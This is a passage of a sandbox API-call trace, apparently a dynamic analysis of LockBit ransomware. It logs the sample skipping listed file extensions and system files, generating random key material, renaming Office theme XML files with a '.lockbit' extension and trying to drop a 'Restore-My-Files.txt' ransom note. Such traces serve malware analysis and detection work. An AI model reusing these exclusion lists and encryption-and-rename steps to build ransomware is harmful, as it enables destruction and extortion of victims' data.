returned -1 [0193.430] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.430] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.431] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Essential.xml") returned 1 [0193.432] lstrcmpiW (lpString1="ntldr", lpString2="Essential.xml") returned 1 [0193.432] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Essential.xml") returned 1 [0193.432] lstrcmpiW (lpString1="bootsect.bak", lpString2="Essential.xml") returned -1 [0193.432] lstrcmpiW (lpString1="autorun.inf", lpString2="Essential.xml") returned -1 [0193.432] lstrcmpiW (lpString1="thumbs.db", lpString2="Essential.xml") returned 1 [0193.432] lstrcmpiW (lpString1="iconcache.db", lpString2="Essential.xml") returned 1 [0193.432] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.432] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml") returned=".xml" [0193.432] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.432] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.432] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.433] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.433] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.lockbit") returned 88 [0193.433] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.435] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.435] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.435] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=928) returned 1 [0193.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.436] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.438] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.438] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0193.440] free (_Block=0x1fa2ed8) [0193.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.440] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1655bb00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1655bb00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Executive.xml", cAlternateFileName="EXECUT~1.XML")) returned 1 [0193.440] lstrcmpiW (lpString1=".", lpString2="Executive.xml") returned -1 [0193.440] lstrcmpiW (lpString1="..", lpString2="Executive.xml") returned -1 [0193.440] PathFindExtensionW (pszPath="Executive.xml") returned=".xml" [0193.440] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.440] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.441] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Executive.xml") returned 1 [0193.442] lstrcmpiW (lpString1="ntldr", lpString2="Executive.xml") returned 1 [0193.443] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Executive.xml") returned 1 [0193.443] lstrcmpiW (lpString1="bootsect.bak", lpString2="Executive.xml") returned -1 [0193.443] lstrcmpiW (lpString1="autorun.inf", lpString2="Executive.xml") returned -1 [0193.443] lstrcmpiW (lpString1="thumbs.db", lpString2="Executive.xml") returned 1 [0193.443] lstrcmpiW (lpString1="iconcache.db", lpString2="Executive.xml") returned 1 [0193.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml") returned=".xml" [0193.443] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.443] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.443] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.444] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.444] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.lockbit") returned 88 [0193.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0193.445] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.445] malloc (_Size=0x40068) returned 0x3d70450 [0193.446] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=964) returned 1 [0193.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0193.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0193.447] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0193.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.450] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.450] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0193.452] free (_Block=0x1fa2ed8) [0193.452] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.452] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.452] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2927500, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2927500, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flow.xml", cAlternateFileName="")) returned 1 [0193.452] lstrcmpiW (lpString1=".", lpString2="Flow.xml") returned -1 [0193.452] lstrcmpiW (lpString1="..", lpString2="Flow.xml") returned -1 [0193.452] PathFindExtensionW (pszPath="Flow.xml") returned=".xml" [0193.452] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.452] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.453] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.454] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Flow.xml") returned 1 [0193.454] lstrcmpiW (lpString1="ntldr", lpString2="Flow.xml") returned 1 [0193.454] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Flow.xml") returned 1 [0193.454] lstrcmpiW (lpString1="bootsect.bak", lpString2="Flow.xml") returned -1 [0193.454] lstrcmpiW (lpString1="autorun.inf", lpString2="Flow.xml") returned -1 [0193.454] lstrcmpiW (lpString1="thumbs.db", lpString2="Flow.xml") returned 1 [0193.454] lstrcmpiW (lpString1="iconcache.db", lpString2="Flow.xml") returned 1 [0193.454] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.454] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml") returned=".xml" [0193.455] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.455] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.455] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.456] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.456] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.lockbit") returned 83 [0193.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0193.457] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.457] malloc (_Size=0x40068) returned 0x3f70048 [0193.457] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=959) returned 1 [0193.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0193.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0193.458] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0193.462] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program 